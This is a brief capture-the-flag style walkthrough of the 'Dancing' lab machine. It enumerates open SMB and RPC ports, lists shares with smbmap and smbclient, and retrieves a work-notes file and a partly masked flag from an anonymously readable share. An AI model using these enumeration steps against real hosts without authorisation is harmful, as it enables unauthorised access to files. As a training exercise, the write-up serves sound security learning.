Dancing
Recon
10.129.9.30
| Port | State | Service | Version |
|---|---|---|---|
| 135/tcp | open | msrpc | Microsoft Windows RPC |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | open | microsoft-ds |
SMB and RPC is available. So we can start enumerating
SMB
└─$ smbmap -H 10.129.9.30
[+] IP: 10.129.9.30:445 Name: 10.129.9.30
└─$ smbclient -L 10.129.9.30
Password for [WORKGROUP\parallels]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.9.30 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We are actually able to view shares, WorkShares is available!
└─$ smbclient \\\\10.129.9.30\\WorkShares
Password for [WORKGROUP\parallels]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Mar 29 04:22:01 2021
.. D 0 Mon Mar 29 04:22:01 2021
Amy.J D 0 Mon Mar 29 05:08:24 2021
James.P D 0 Thu Jun 3 04:38:03 2021
5114111 blocks of size 4096. 1732677 blocks available
We were able to grab worknotes.txt from Amy.J folder and flag.txt from James.P.
└─$ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
And...
└─$ cat flag.txt
5f6****************664
Summary
These are easy little refreshers.